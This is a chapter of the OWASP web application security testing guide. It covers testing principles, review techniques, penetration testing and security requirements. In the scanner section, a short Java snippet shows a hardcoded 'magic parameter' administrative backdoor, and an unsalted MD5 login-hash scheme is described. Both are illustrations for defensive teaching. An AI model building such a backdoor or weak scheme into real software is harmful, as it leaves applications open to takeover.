This document is designed to help organizations understand what comprises a testing program, and to help them identify the steps that they need to undertake to build and operate that testing program on their web applications. It is intended to give a broad view of the elements required to make a comprehensive web application security program. This guide can be used as a reference and as a methodology to help determine the gap between your existing practices and industry best practices. This guide allows organizations to compare themselves against industry peers, understand the magnitude of resources required to test and maintain their software, or prepare for an audit. This chapter does not go into the technical details of how to test an application, as the intent is to provide a typical security organizational framework. The technical details about how to test an application, as part of a penetration test or code review will be covered in the remaining parts of this document. &lt;br /&gt;
&lt;br /&gt;
'''When to Test'''&amp;lt;br&amp;gt;&lt;br /&gt;
Most people today don’t test the software until it has already been created and is in the deployment phase of its life cycle (i.e., code has been created and instantiated into a working web application). This is generally a very ineffective and cost-prohibitive practice. One of the best methods to prevent security bugs from appearing in production applications is to improve the Software Development Life Cycle (SDLC) by including security in each of its phases. An SDLC is a structure imposed on the development of software artifacts. If an SDLC is not currently being used in your environment, it is time to pick one! The following figure shows a generic SDLC model as well as the (estimated) increasing cost of fixing security bugs in such a model. &lt;br /&gt;
&lt;br /&gt;
&amp;lt;center&amp;gt;[[Image:SDLC.jpg]]&amp;lt;br&amp;gt;&lt;br /&gt;
''Figure 1: Generic SDLC Model'' &amp;lt;/center&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Companies should inspect their overall SDLC to ensure that security is an integral part of the development process. SDLCs should include security tests to ensure security is adequately covered and controls are effective throughout the development process. &lt;br /&gt;
&lt;br /&gt;
'''What to Test'''&amp;lt;br&amp;gt;&lt;br /&gt;
It can be helpful to think of software development as a combination of people, process, and technology. If these are the factors that &amp;quot;create&amp;quot; software, then it is logical that these are the factors that must be tested. Today most people generally test the technology or the software itself. &lt;br /&gt;
&lt;br /&gt;
An effective testing program should have components that test ''People'' – to ensure that there is adequate education and awareness; ''Process'' – to ensure that there are adequate policies and standards and that people know how to follow these policies; ''Technology'' – to ensure that the process has been effective in its implementation. Unless a holistic approach is adopted, testing just the technical implementation of an application will not uncover management or operational vulnerabilities that could be present. By testing the people, policies, and processes, an organization can catch issues that would later manifest themselves into defects in the technology, thus eradicating bugs early and identifying the root causes of defects. Likewise, testing only some of the technical issues that can be present in a system will result in an incomplete and inaccurate security posture assessment. Denis Verdon, Head of Information Security at [http://www.fnf.com Fidelity National Financial] presented an excellent analogy for this misconception at the OWASP AppSec 2004 Conference in New York [5]: &amp;quot;If cars were built like applications [...] safety tests would assume frontal impact only. Cars would not be roll tested, or tested for stability in emergency maneuvers, brake effectiveness, side impact, and resistance to theft.&amp;quot; &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''Feedback and Comments'''&amp;lt;br&amp;gt;&lt;br /&gt;
As with all OWASP projects, we welcome comments and feedback. We especially like to know that our work is being used and that it is effective and accurate.&lt;br /&gt;
&lt;br /&gt;
==Principles of Testing==&lt;br /&gt;
&lt;br /&gt;
There are some common misconceptions when developing a testing methodology to weed out security bugs in software. This chapter covers some of the basic principles that should be taken into account by professionals when testing for security bugs in software. &lt;br /&gt;
&lt;br /&gt;
'''There is No Silver Bullet'''&amp;lt;br&amp;gt;&lt;br /&gt;
While it is tempting to think that a security scanner or application firewall will either provide a multitude of defenses or identify a multitude of problems, in reality there are no silver bullets to the problem of insecure software. Application security assessment software, while useful as a first pass to find low-hanging fruit, is generally immature and ineffective at in-depth assessments and at providing adequate test coverage. Remember that security is a process, not a product. &lt;br /&gt;
&lt;br /&gt;
'''Think Strategically, Not Tactically'''&amp;lt;br&amp;gt;&lt;br /&gt;
Over the last few years, security professionals have come to realize the fallacy of the patch-and-penetrate model that was pervasive in information security during the 1990’s. The patch-and-penetrate model involves fixing a reported bug, but without proper investigation of the root cause. This model is usually associated with the window of vulnerability shown in the figure below. The evolution of vulnerabilities in common software used worldwide has shown the ineffectiveness of this model. Fore more information about the window of vulnerability please refer to [6]. Vulnerability studies [7] have shown that with the reaction time of attackers worldwide, the typical window of vulnerability does not provide enough time for patch installation, since the time between a vulnerability being uncovered and an automated attack against it being developed and released is decreasing every year. There are also several wrong assumptions in the patch-and-penetrate model: patches interfere with the normal operations and might break existing applications, and not all the users might (in the end) be aware of a patch’s availability. Consequently not all the product's users will apply patches, either because of this issue or because they lack knowledge about the patch's existence.&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;center&amp;gt;[[Image:WindowExposure.jpg]]&amp;lt;br&amp;gt;&lt;br /&gt;
''Figure 2: Window of Vulnerability''&amp;lt;/center&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
To prevent reoccurring security problems within an application, it is essential to build security into the Software Development Life Cycle (SDLC) by developing standards, policies, and guidelines that fit and work within the development methodology. Threat modeling and other techniques should be used to help assign appropriate resources to those parts of a system that are most at risk. &lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
'''The SDLC is King'''&amp;lt;br&amp;gt;&lt;br /&gt;
The SDLC is a process that is well-known to developers. By integrating security into each phase of the SDLC, it allows for a holistic approach to application security that leverages the procedures already in place within the organization. Be aware that while the names of the various phases may change depending on the SDLC model used by an organization, each conceptual phase of the archetype SDLC will be used to develop the application (i.e., define, design, develop, deploy, maintain). Each phase has security considerations that should become part of the existing process, to ensure a cost-effective and comprehensive security program. &lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
'''Test Early and Test Often'''&amp;lt;br&amp;gt;&lt;br /&gt;
When a bug is detected early within the SDLC, it can be addressed more quickly and at a lower cost. A security bug is no different from a functional or performance-based bug in this regard. A key step in making this possible is to educate the development and QA organizations about common security issues and the ways to detect and prevent them. Although new libraries, tools, or languages might help design better programs (with fewer security bugs), new threats arise constantly and developers must be aware of those that affect the software they are developing. Education in security testing also helps developers acquire the appropriate mindset to test an application from an attacker's perspective. This allows each organization to consider security issues as part of their existing responsibilities.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
'''Understand the Scope of Security'''&amp;lt;br&amp;gt;&lt;br /&gt;
It is important to know how much security a given project will require. The information and assets that are to be protected should be given a classification that states how they are to be handled (e.g., Confidential, Secret, Top Secret). Discussions should occur with legal council to ensure that any specific security need will be met. In the USA they might come from federal regulations, such as the Gramm-Leach-Bliley Act [8], or from state laws, such as the California SB-1386 [9]. For organizations based in EU countries, both country-specific regulation and EU Directives might apply. For example, Directive 96/46/EC4 [10] makes it mandatory to treat personal data in applications with due care, whatever the application. &lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
'''Develop the Right Mindset'''&amp;lt;br&amp;gt;&lt;br /&gt;
Successfully testing an application for security vulnerabilities requires thinking &amp;quot;outside of the box.&amp;quot; Normal use cases will test the normal behavior of the application when a user is using it in the manner that you expect. Good security testing requires going beyond what is expected and thinking like an attacker who is trying to break the application. Creative thinking can help to determine what unexpected data may cause an application to fail in an insecure manner. It can also help find what assumptions made by web developers are not always true and how they can be subverted. This is one of the reasons why automated tools are actually bad at automatically testing for vulnerabilities: this creative thinking must be done on a case-by-case basis and most web applications are being developed in a unique way (even if using common frameworks). &lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
'''Understand the Subject'''&amp;lt;br&amp;gt;&lt;br /&gt;
One of the first major initiatives in any good security program should be to require accurate documentation of the application. The architecture, data-flow diagrams, use cases, and more should be written in formal documents and made available for review. The technical specification and application documents should include information that lists not only the desired use cases, but also any specifically disallowed use case. Finally, it is good to have at least a basic security infrastructure that allows the monitoring and trending of attacks against an organization's applications and network (e.g., IDS systems). &lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
'''Use the Right Tools'''&amp;lt;br&amp;gt;&lt;br /&gt;
While we have already stated that there is no silver bullet tool, tools do play a critical role in the overall security program. There is a range of open source and commercial tools that can automate many routine security tasks. These tools can simplify and speed up the security process by assisting security personnel in their tasks. It is important to understand exactly what these tools can and cannot do, however, so that they are not oversold or used incorrectly. &lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
'''The Devil is in the Details'''&amp;lt;br&amp;gt;&lt;br /&gt;
It is critical not to perform a superficial security review of an application and consider it complete. This will instill a false sense of confidence that can be as dangerous as not having done a security review in the first place. It is vital to carefully review the findings and weed out any false positive that may remain in the report. Reporting an incorrect security finding can often undermine the valid message of the rest of a security report. Care should be taken to verify that every possible section of application logic has been tested, and that every use case scenario was explored for possible vulnerabilities. &lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
'''Use Source Code When Available'''&amp;lt;br&amp;gt;&lt;br /&gt;
While black box penetration test results can be impressive and useful to demonstrate how vulnerabilities are exposed in production, they are not the most effective way to secure an application. If the source code for the application is available, it should be given to the security staff to assist them while performing their review. It is possible to discover vulnerabilities within the application source that would be missed during a black box engagement. &lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
'''Develop Metrics'''&amp;lt;br&amp;gt;&lt;br /&gt;
An important part of a good security program is the ability to determine if things are getting better. It is important to track the results of testing engagements, and develop metrics that will reveal the application security trends within the organization. These metrics can show if more education and training are required, if there is a particular security mechanism that is not clearly understood by development, and if the total number of security related problems being found each month is going down. Consistent metrics that can be generated in an automated way from available source code will also help the organization in assessing the effectiveness of mechanisms introduced to reduce security bugs in software development. Metrics are not easily developed, so using standard metrics like those provided by the OWASP Metrics project and other organizations might be a good head start.&amp;lt;br&amp;gt;&lt;br /&gt;
'''Document the Test Results'''&amp;lt;br&amp;gt;&lt;br /&gt;
To conclude the testing process, it is important to produce a formal record of what testing actions were taken, by whom, when they ware performed, and details of the test findings. It is wise to agree on an acceptable format for the report which is useful to all concerned parties, which may include developers, project management, business owners, IT department, audit, and compliance. The report must be clear to the business owner in identifying where material risks exist and sufficient to get their backing for subsequent mitigation actions. The report must be clear to the developer in pin-pointing the exact function that is affected by the vulnerability, with associated recommendations for resolution in a language that the developer will understand (no pun intended). Last but not least, the report writing should not be overly burdensome on the security tester themselves; security testers are not generally renowned for their creative writing skills, therefore agreeing on a complex report can lead to instances where test results do not get properly documented.&lt;br /&gt;
&lt;br /&gt;
==Testing Techniques Explained==&lt;br /&gt;
&lt;br /&gt;
This section presents a high-level overview of various testing techniques that can be employed when building a testing program. It does not present specific methodologies for these techniques, although Chapter 3 will address this information. This section is included to provide context for the framework presented in the next hapter and to highlight the advantages and disadvantages of some of the techniques that should be considered. In particular, we will cover:&lt;br /&gt;
* Manual Inspections &amp;amp; Reviews &lt;br /&gt;
* Threat Modeling &lt;br /&gt;
* Code Review &lt;br /&gt;
* Penetration Testing &lt;br /&gt;
&lt;br /&gt;
=== Manual Inspections &amp;amp; Reviews ===&lt;br /&gt;
'''Overview'''&amp;lt;br&amp;gt;&lt;br /&gt;
Manual inspections are human-driven reviews that typically test the security implications of the people, policies, and processes, but can include inspection of technology decisions such as architectural designs. They are usually conducted by analyzing documentation or performing interviews with the designers or system owners. While the concept of manual inspections and human reviews is simple, they can be among the most powerful and effective techniques available. By asking someone how something works and why it was implemented in a specific way, it allows the tester to quickly determine if any security concerns are likely to be evident. Manual inspections and reviews are one of the few ways to test the software development life-cycle process itself and to ensure that there is an adequate policy or skill set in place. As with many things in life, when conducting manual inspections and reviews we suggest you adopt a trust-but-verify model. Not everything everyone tells you or shows you will be accurate. Manual reviews are particularly good for testing whether people understand the security process, have been made aware of policy, and have the appropriate skills to design or implement a secure application. Other activities, including manually reviewing the documentation, secure coding policies, security requirements, and architectural designs, should all be accomplished using manual inspections.&lt;br /&gt;
&lt;br /&gt;
'''Advantages:'''&lt;br /&gt;
* Requires no supporting technology &lt;br /&gt;
* Can be applied to a variety of situations&lt;br /&gt;
* Flexible &lt;br /&gt;
* Promotes teamwork &lt;br /&gt;
* Early in the SDLC &lt;br /&gt;
&lt;br /&gt;
'''Disadvantages:'''&lt;br /&gt;
* Can be time consuming &lt;br /&gt;
* Supporting material not always available &lt;br /&gt;
* Requires significant human thought and skill to be effective!&lt;br /&gt;
&lt;br /&gt;
=== Threat Modeling ===&lt;br /&gt;
'''Overview'''&amp;lt;br&amp;gt;&lt;br /&gt;
Threat modeling has become a popular technique to help system designers think about the security threats that their systems/applications might face. Therefore, threat modeling can be seen as risk assessment for applications. In fact, it enables the designer to develop mitigation strategies for potential vulnerabilities and helps them focus their inevitably limited resources and attention on the parts of the system that most require it. It is recommended that all applications have a threat model developed and documented. Threat models should be created as early as possible in the SDLC, and should be revisited as the application evolves and development progresses. To develop a threat model, we recommend taking a simple approach that follows the NIST 800-30 [11] standard for risk assessment. This approach involves: &lt;br /&gt;
* Decomposing the application – understand, through a process of manual inspection, how the application works, its assets, functionality, and connectivity. &lt;br /&gt;
* Defining and classifying the assets – classify the assets into tangible and intangible assets and rank them according to business importance. &lt;br /&gt;
* Exploring potential vulnerabilities - whether technical, operational, or management. &lt;br /&gt;
* Exploring potential threats – develop a realistic view of potential attack vectors from an attacker’s perspective, by using threat scenarios or attack trees.&lt;br /&gt;
* Creating mitigation strategies – develop mitigating controls for each of the threats deemed to be realistic. The output from a threat model itself can vary but is typically a collection of lists and diagrams. The OWASP Code Review Guide outlines an Application Threat Modeling methodology that can be used as a reference for the testing applications for potential security flaws in the design of the application. There is no right or wrong way to develop threat models and perform information risk assessments on applications. [12]. &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''Advantages:'''&lt;br /&gt;
* Practical attacker's view of the system &lt;br /&gt;
* Flexible &lt;br /&gt;
* Early in the SDLC &lt;br /&gt;
&lt;br /&gt;
'''Disadvantages: &amp;lt;br&amp;gt;'''&lt;br /&gt;
* Relatively new technique &lt;br /&gt;
* Good threat models don’t automatically mean good software&lt;br /&gt;
&lt;br /&gt;
=== Source Code Review ===&lt;br /&gt;
'''Overview'''&amp;lt;br&amp;gt;&lt;br /&gt;
Source code review is the process of manually checking a web application's source code for security issues. Many serious security vulnerabilities cannot be detected with any other form of analysis or testing. As the popular saying goes “if you want to know what’s really going on, go straight to the source.&amp;quot; Almost all security experts agree that there is no substitute for actually looking at the code. All the information for identifying security problems is there in the code somewhere. Unlike testing third party closed software such as operating systems, when testing web applications (especially if they have been developed in-house) the source code should be made available for testing purposes. Many unintentional but significant security problems are also extremely difficult to discover with other forms of analysis or testing, such as penetration testing, making source code analysis the technique of choice for technical testing. With the source code, a tester can accurately determine what is happening (or is supposed to be happening) and remove the guess work of black box testing. Examples of issues that are particularly conducive to being found through source code reviews include concurrency problems, flawed business logic, access control problems, and cryptographic weaknesses as well as backdoors, Trojans, Easter eggs, time bombs, logic bombs, and other forms of malicious code. These issues often manifest themselves as the most harmful vulnerabilities in web sites. Source code analysis can also be extremely efficient to find implementation issues such as places where input validation was not performed or when fail open control procedures may be present. But keep in mind that operational procedures need to be reviewed as well, since the source code being deployed might not be the same as the one being analyzed herein [13].&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''Advantages:'''&lt;br /&gt;
* Completeness and effectiveness &lt;br /&gt;
* Accuracy &lt;br /&gt;
* Fast (for competent reviewers) &lt;br /&gt;
&lt;br /&gt;
'''Disadvantages:'''&lt;br /&gt;
* Requires highly skilled security developers &lt;br /&gt;
* Can miss issues in compiled libraries &lt;br /&gt;
* Cannot detect run-time errors easily &lt;br /&gt;
* The source code actually deployed might differ from the one being analyzed&lt;br /&gt;
&lt;br /&gt;
'''For more on code review, checkout the [[OWASP Code Review Project|OWASP code review project]]'''.&amp;lt;BR&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Penetration Testing ===&lt;br /&gt;
'''Overview'''&amp;lt;br&amp;gt;&lt;br /&gt;
Penetration testing has been a common technique used to test network security for many years. It is also commonly known as black box testing or ethical hacking. Penetration testing is essentially the “art” of testing a running application remotely, without knowing the inner workings of the application itself, to find security vulnerabilities. Typically, the penetration test team would have access to an application as if they were users. The tester acts like an attacker and attempts to find and exploit vulnerabilities. In many cases the tester will be given a valid account on the system. While penetration testing has proven to be effective in network security, the technique does not naturally translate to applications. When penetration testing is performed on networks and operating systems, the majority of the work is involved in finding and then exploiting known vulnerabilities in specific technologies. As web applications are almost exclusively bespoke, penetration testing in the web application arena is more akin to pure research. Penetration testing tools have been developed that automate the process, but, again, with the nature of web applications their effectiveness is usually poor. Many people today use web application penetration testing as their primary security testing technique. Whilst it certainly has its place in a testing program, we do not believe it should be considered as the primary or only testing technique. Gary McGraw in [14] summed up penetration testing well when he said, “If you fail a penetration test you know you have a very bad problem indeed. If you pass a penetration test you do not know that you don’t have a very bad problem”. However, focused penetration testing (i.e., testing that attempts to exploit known vulnerabilities detected in previous reviews) can be useful in detecting if some specific vulnerabilities are actually fixed in the source code deployed on the web site. &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''Advantages:'''&lt;br /&gt;
* Can be fast (and therefore cheap) &lt;br /&gt;
* Requires a relatively lower skill-set than source code review &lt;br /&gt;
* Tests the code that is actually being exposed &lt;br /&gt;
&lt;br /&gt;
'''Disadvantages:'''&lt;br /&gt;
* Too late in the SDLC &lt;br /&gt;
* Front impact testing only!&lt;br /&gt;
&lt;br /&gt;
=== The Need for a Balanced Approach ===&lt;br /&gt;
With so many techniques and so many approaches to testing the security of web applications, it can be difficult to understand which techniques to use and when to use them.&lt;br /&gt;
Experience shows that there is no right or wrong answer to exactly what techniques should be used to build a testing framework. The fact remains that all techniques should probably be used to ensure that all areas that need to be tested are tested. What is clear, however, is that there is no single technique that effectively covers all security testing that must be performed to ensure that all issues have been addressed. Many companies adopt one approach, which has historically been penetration testing. Penetration testing, while useful, cannot effectively address many of the issues that need to be tested, and is simply “too little too late” in the software development life cycle (SDLC). &lt;br /&gt;
The correct approach is a balanced one that includes several techniques, from manual interviews to technical testing. The balanced approach is sure to cover testing in all phases of the SDLC. This approach leverages the most appropriate techniques available depending on the current SDLC phase. &lt;br /&gt;
Of course there are times and circumstances where only one technique is possible; for example, a test on a web application that has already been created, and where the testing party does not have access to the source code. In this case, penetration testing is clearly better than no testing at all. However, we encourage the testing parties to challenge assumptions, such as no access to source code, and to explore the possibility of more complete testing. &lt;br /&gt;
A balanced approach varies depending on many factors, such as the maturity of the testing process and corporate culture. However, it is recommended that a balanced testing framework look something like the representations shown in Figure 3 and Figure 4. The following figure shows a typical proportional representation overlaid onto the software development life cycle. In keeping with research and experience, it is essential that companies place a higher emphasis on the early stages of development.&lt;br /&gt;
&amp;lt;center&amp;gt;&lt;br /&gt;
[[Image:ProportionSDLC.png]]&lt;br /&gt;
&amp;lt;br&amp;gt;''Figure 3: Proportion of Test Effort in SDLC''&lt;br /&gt;
&amp;lt;/center&amp;gt;&lt;br /&gt;
The following figure shows a typical proportional representation overlaid onto testing techniques. &amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;center&amp;gt;&lt;br /&gt;
[[Image:ProportionTest.png]]&lt;br /&gt;
&amp;lt;br&amp;gt;''Figure 4: Proportion of Test Effort According to Test Technique''&lt;br /&gt;
&amp;lt;/center&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''A Note about Web Application Scanners'''&amp;lt;br&amp;gt;&lt;br /&gt;
Many organizations have started to use automated web application scanners. While they undoubtedly have a place in a testing program, we want to highlight some fundamental issues about why we do not believe that automating black box testing is (or will ever be) effective. By highlighting these issues, we are not discouraging web application scanner use. Rather, we are saying that their limitations should be understood, and testing frameworks should be planned appropriately.&lt;br /&gt;
NB: OWASP is currently working to develop a web application scanner-benchmarking platform. The following examples indicate why automated black box testing is not effective. &lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
'''Example 1: Magic Parameters'''&amp;lt;br&amp;gt;&lt;br /&gt;
Imagine a simple web application that accepts a name-value pair of “magic” and then the value. For simplicity, the GET request may be: ''&amp;lt;nowiki&amp;gt;http://www.host/application?magic=value&amp;lt;/nowiki&amp;gt;'' &amp;lt;br&amp;gt; To further simplify the example, the values in this case can only be ASCII characters a – z (upper or lowercase) and integers 0 – 9. The designers of this application created an administrative backdoor during testing, but obfuscated it to prevent the casual observer from discovering it. By submitting the value sf8g7sfjdsurtsdieerwqredsgnfg8d (30 characters), the user will then be logged in and presented with an administrative screen with total control of the application. The HTTP request is now:&amp;lt;br&amp;gt; ''&amp;lt;nowiki&amp;gt;http://www.host/application?magic= sf8g7sfjdsurtsdieerwqredsgnfg8d &amp;lt;/nowiki&amp;gt;'' &amp;lt;br&amp;gt;&lt;br /&gt;
Given that all of the other parameters were simple two- and three-characters fields, it is not possible to start guessing combinations at approximately 28 characters. A web application scanner will need to brute force (or guess) the entire key space of 30 characters. That is up to 30^28 permutations, or trillions of HTTP requests! That is an electron in a digital haystack! &lt;br /&gt;
The code for this exemplar Magic Parameter check may look like the following: &amp;lt;br&amp;gt;&lt;br /&gt;
 public void doPost( HttpServletRequest request, HttpServletResponse response) &lt;br /&gt;
 { &lt;br /&gt;
 String magic = “sf8g7sfjdsurtsdieerwqredsgnfg8d”; &lt;br /&gt;
 boolean admin = magic.equals( request.getParameter(“magic”));&lt;br /&gt;
 if (admin) doAdmin( request, response); &lt;br /&gt;
 else …. // normal processing &lt;br /&gt;
 } &lt;br /&gt;
By looking in the code, the vulnerability practically leaps off the page as a potential problem. &lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
'''Example 2: Bad Cryptography'''&amp;lt;br&amp;gt;&lt;br /&gt;
Cryptography is widely used in web applications. Imagine that a developer decided to write a simple cryptography algorithm to sign a user in from site A to site B automatically. In his/her wisdom, the developer decides that if a user is logged into site A, then he/she will generate a key using an MD5 hash function that comprises: ''Hash { username : date }'' &amp;lt;br&amp;gt;&lt;br /&gt;
When a user is passed to site B, he/she will send the key on the query string to site B in an HTTP re-direct. Site B independently computes the hash, and compares it to the hash passed on the request. If they match, site B signs the user in as the user they claim to be. Clearly, as we explain the scheme, the inadequacies can be worked out, and it can be seen how anyone that figures it out (or is told how it works, or downloads the information from Bugtraq) can login as any user. Manual inspection, such as an interview, would have uncovered this security issue quickly, as would inspection of the code. A black-box web application scanner would have seen a 128-bit hash that changed with each user, and by the nature of hash functions, did not change in any predictable way.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
'''A Note about Static Source Code Review Tools'''&amp;lt;br&amp;gt;&lt;br /&gt;
Many organizations have started to use static source code scanners. While they undoubtedly have a place in a comprehensive testing program, we want to highlight some fundamental issues about why we do not believe this approach is effective when used alone. Static source code analysis alone cannot identify issues due to flaws in the design since it cannot understand the context in which the code is constructed. Source code analysis tools are useful in determining security issues due to coding errors, however significant manual effort is required to validate the findings. &lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==Security Requirements Test Derivation==&lt;br /&gt;
If you want to have a successful testing program, you need to know what the objectives of the testing are. These objectives are specified by security requirements. This section discusses in detail how to document requirements for security testing by deriving them from applicable standards and regulations and positive and negative application requirements. It also discusses how security requirements effectively drive security testing during the SDLC and how security test data can be used to effectively manage software security risks.&lt;br /&gt;
&lt;br /&gt;
'''Testing Objectives'''&amp;lt;br&amp;gt;&lt;br /&gt;
One of the objectives of security testing is to validate that security controls function as expected. This is documented via ''security requirements'' that describe the functionality of the security control. At a high level, this means proving confidentiality, integrity, and availability of the data as well as the service.  The other objective is to validate that security controls are implemented with few or no vulnerabilities. These are common vulnerabilities, such as the [[OWASP Top Ten]], as well as vulnerabilities that are previously identified with security assessments during the SDLC, such as threat modeling, source code analysis, and penetration test. &lt;br /&gt;
&lt;br /&gt;
'''Security Requirements Documentation'''&amp;lt;br&amp;gt;&lt;br /&gt;
The first step in the documentation of security requirements is to understand the ''business requirements''. A business requirement document could provide the initial, high-level information of the expected functionality for the application. For example, the main purpose of an application may be to provide financial services to customers or shopping and purchasing goods from an on-line catalogue. A security section of the business requirements should highlight the need to protect the customer data as well as to comply with applicable security documentation such as regulations, standards, and policies.&lt;br /&gt;
&lt;br /&gt;
A general checklist of the applicable regulations, standards, and policies serves well the purpose of a preliminary security compliance analysis for web applications. For example, compliance regulations can be identified by checking information about the business sector and the country/state where the application needs to function/operate. Some of these compliance guidelines and regulations might translate in specific technical requirements for security controls. For example, in the case of financial applications, the compliance with FFIEC guidelines for authentication [15] requires that financial institutions implement applications that mitigate weak authentication risks with multi-layered security control and multi factor authentication. &lt;br /&gt;
&lt;br /&gt;
Applicable industry standards for security need also to be captured by the general security requirement checklist. For example, in the case of applications that handle customer credit card data, the compliance with the PCI DSS [16] standard forbids the storage of PINs and CVV2 data and requires that the merchant protect magnetic strip data in storage and transmission with encryption and on display by masking. Such PCI DSS security requirements could be validated via source code analysis.&lt;br /&gt;
&lt;br /&gt;
Another section of the checklist needs to enforce general requirements for compliance with the organization information security standards and policies. From the functional requirements perspective, requirements for the security control need to map to a specific section of the information security standards. An example of such requirement can be: &amp;quot;a password complexity of six alphanumeric characters must be enforced by the authentication controls used by the application.&amp;quot; When security requirements map to compliance rules a security test can validate the exposure of compliance risks. If violation with information security standards and policies are found, these will result in a risk that can be documented and that the business has to deal with (i.e., manage). For this reason, since these security compliance requirements are enforceable, they need to be well documented and validated with security tests. &lt;br /&gt;
&lt;br /&gt;
'''Security Requirements Validation'''&amp;lt;br&amp;gt;&lt;br /&gt;
From the functionality perspective, the validation of security requirements is the main objective of security testing, while, from the risk management perspective, this is the objective of information security assessments. At a high level, the main goal of information security assessments is the identification of gaps in security controls, such as lack of basic authentication, authorization, or encryption controls. More in depth, the security assessment objective is risk analysis, such as the identification of potential weaknesses in security controls that ensure the confidentiality, integrity, and availability of the data. For example, when the application deals with personal identifiable information (PII) and sensitive data, the security requirement to be validated is the compliance with the company information security policy requiring encryption of such data in transit and in storage. Assuming encryption is used to protect the data, encryption algorithms and key lengths need to comply with the organization encryption standards. These might require that only certain algorithms and key lengths could be used. For example, a security requirement that can be security tested is verifying that only allowed ciphers are used (e.g., SHA-1, RSA, 3DES) with allowed minimum key lengths (e.g., more than 128 bit for symmetric and more than 1024 for asymmetric encryption).&lt;br /&gt;
&lt;br /&gt;
From the security assessment perspective, security requirements can be validated at different phases of the SDLC by using different artifacts and testing methodologies. For example, threat modeling focuses on identifying security flaws during design, secure code analysis and reviews focus on identifying security issues in source code during development, and penetration testing focuses on identifying vulnerabilities in the application during testing/validation. &lt;br /&gt;
&lt;br /&gt;
Security issues that are identified early in the SDLC can be documented in a test plan so they can be validated later with security tests. By combining the results of different testing techniques, it is possible to derive better security test cases and increase the level of assurance of the security requirements. For example, distinguishing true vulnerabilities from the un-exploitable ones is possible when the results of penetration tests and source code analysis are combined.  Considering the security test for a SQL injection vulnerability, for example, a black box test might involve first a scan of the application to fingerprint the vulnerability. The first evidence of a potential SQL injection vulnerability that can be validated is the generation of a SQL exception. A further validation of the SQL vulnerability might involve manually injecting attack vectors to modify the grammar of the SQL query for an information disclosure exploit. This might involve a lot of trial-and-error analysis till the malicious query is executed. Assuming the tester has the source code, she might learn from the source code analysis on how to construct the SQL attack vector that can exploit the vulnerability (e.g., execute a malicious query returning confidential data to unauthorized user).&lt;br /&gt;
&lt;br /&gt;
'''Threats and Countermeasures Taxonomies'''&amp;lt;br&amp;gt;&lt;br /&gt;
A ''threat and countermeasure classification'' that takes into consideration root causes of vulnerabilities is the critical factor to verify that security controls are designed, coded, and built so that the impact due to the exposure of such vulnerabilities is mitigated. In the case of web applications, the exposure of security controls to common vulnerabilities, such as the OWASP Top Ten, can be a good starting point to derive general security requirements. More specifically, the web application security frame [17] provides a classification (e.g. taxonomy) of vulnerabilities that can be documented in different guidelines and standards and validated with security tests. &lt;br /&gt;
&lt;br /&gt;
The focus of a threat and countermeasure categorization is to define security requirements in terms of the threats and the root cause of the vulnerability. A threat can be categorized by using STRIDE [18], for example, as Spoofing, Tampering, Repudiation, Information disclosure, Denial of service, and Elevation of privilege. The root cause can be categorized as security flaw in design, a security bug in coding, or an issue due to insecure configuration. For example, the root cause of weak authentication vulnerability might be the lack of mutual authentication when data crosses a trust boundary between the client and server tiers of the application. A security requirement that captures the threat of non-repudiation during an architecture design review allows for the documentation of the requirement for the countermeasure (e.g., mutual authentication) that can be validated later on with security tests.&lt;br /&gt;
&lt;br /&gt;
A threat and countermeasure categorization for vulnerabilities can also be used to document security requirements for secure coding such as secure coding standards. An example of a common coding error in authentication controls consists of applying an hash function to encrypt a password, without applying a seed to the value. From the secure coding perspective, this is a vulnerability that affects the encryption used for authentication with a vulnerability root cause in a coding error. Since the root cause is insecure coding the security requirement can be documented in secure coding standards and validated through secure code reviews during the development phase of the SDLC.&lt;br /&gt;
&lt;br /&gt;
'''Security Testing and Risk Analysis'''&amp;lt;br&amp;gt;&lt;br /&gt;
Security requirements need to take into consideration the severity of the vulnerabilities to support a ''risk mitigation strategy''. Assuming that the organization maintains a repository of vulnerabilities found in applications, i.e., a vulnerability knowledge base, the security issues can be reported by type, issue, mitigation, root cause, and mapped to the applications where they are found.  Such a vulnerability knowledge base can also be used to establish a metrics to analyze the effectiveness of the security tests throughout the SDLC.&lt;br /&gt;
 &lt;br /&gt;
For example, consider an input validation issue, such as a SQL injection, which was identified via source code analysis and reported with a coding error root cause and input validation vulnerability type. The exposure of such vulnerability can be assessed via a penetration test, by probing input fields with several SQL injection attack vectors. This test might validate that special characters are filtered before hitting the database and mitigate the vulnerability. By combining the results of source code analysis and penetration testing it is possible to determine the likelihood and exposure of the vulnerability and calculate the risk rating of the vulnerability. By reporting vulnerability risk ratings in the findings (e.g., test report) it is possible to decide on the mitigation strategy. For example, high and medium risk vulnerabilities can be prioritized for remediation, while low risk can be fixed in further releases.&lt;br /&gt;
&lt;br /&gt;
